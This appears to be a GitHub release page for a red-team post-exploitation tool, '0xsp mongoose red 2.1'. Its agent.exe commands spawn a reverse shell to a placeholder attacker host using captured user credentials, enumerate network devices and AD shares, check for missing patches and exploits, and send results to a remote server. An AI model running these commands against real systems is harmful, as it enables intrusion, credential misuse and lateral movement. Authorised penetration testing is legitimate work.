-
-
Notifications
You must be signed in to change notification settings - Fork 121
0xsp mongoose red version 2.1
the newer version comes with different techniques and enhancement, and it is totally remastered from scratch to assist your pen-testing / red teaming operations.
this feature allows starting a reverse shell directly from the compromised machine using users'account credentials with ability to keep the current session active.
agent.exe -r username password cmd.exe
[+] trying to Spawn a shell ....!
[*] set RHOST >
remoteattackerip
[*] set RPORT >
remote port
actually this feature give am accurate results in some tested environment, about sometimes firewalls will stop it from working, but it is very helpful to retrieve information about locally connected devices and available shares in AD or local network
agent.exe -nds
a new technique has been added into 0xsp mongoose red 2.1, which will able to detect newer vulnerabilities by communicating into windows update API to assure if there are missing patches.
agent.exe -e
[!] Loading exploit definitions inspection module
[!] Loading exploit checking engine
also, you can port any results into node js application via the following command
agent.exe -e -o nodejsip -x password